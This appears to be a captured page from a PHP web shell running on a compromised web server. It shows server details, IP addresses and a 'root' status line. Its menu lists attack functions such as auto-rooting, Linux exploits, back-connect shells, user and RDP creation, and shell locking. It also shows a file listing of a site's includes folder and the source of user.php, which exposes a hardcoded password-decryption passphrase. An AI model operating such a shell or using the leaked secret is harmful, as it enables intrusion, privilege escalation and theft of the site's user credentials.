Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
fichatecnica /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
Conecciones
[ DIR ]
drwxr-xr-x
RecuperarFotos.php
552
B
-rw-r--r--
db.php
847
B
-rw-r--r--
guardaTabTanques.php
2.46
KB
-rw-r--r--
logout.php
168
B
-rw-r--r--
obtener_datos.php
430
B
-rw-r--r--
procesarFormulario.php
3.55
KB
-rw-r--r--
procesarFormulario2.php
2.52
KB
-rw-r--r--
procesarTablaTableroElectico.p...
2.74
KB
-rw-r--r--
procesarTablaVentas.php
3.01
KB
-rw-r--r--
recuperarDatos.php
1.31
KB
-rw-r--r--
recuperarDatos2.php
812
B
-rw-r--r--
recuperarTabTanques.php
1.26
KB
-rw-r--r--
recuperarTablaControlVentas.ph...
1.59
KB
-rw-r--r--
recuperarTablaTabElectrico.php
1.42
KB
-rw-r--r--
subir_imagen.php
1.53
KB
-rw-r--r--
user.php
1.11
KB
-rw-r--r--
user_sesion.php
619
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user.php
<?php include_once 'db.php'; class User extends DB{ private $nombre; private $username; public function userExists($user, $pass){ $pdo = $this->connect(); $query = $pdo->prepare("SELECT * FROM usuarios WHERE username = :user AND CONVERT(VARCHAR(255), DECRYPTBYPASSPHRASE('sJ8e9#2L@df4!hN$', clave)) = :pass"); $query->bindParam(':user', $user, PDO::PARAM_STR); $query->bindParam(':pass', $pass, PDO::PARAM_STR); $query->execute(); if($query instanceof PDOStatement && $query->rowCount()){ return true; } else { return false; } } public function setUser($user){ $query = $this->connect()->prepare('SELECT * FROM usuarios WHERE username = :user'); $query->execute(['user' => $user]); foreach ($query as $currentUser) { $this->nombre = $currentUser['nombre']; $this->username = $currentUser['username']; } } public function getNombre(){ return $this->nombre; } public function getUsuario(){ return $this->username; } } ?>
Close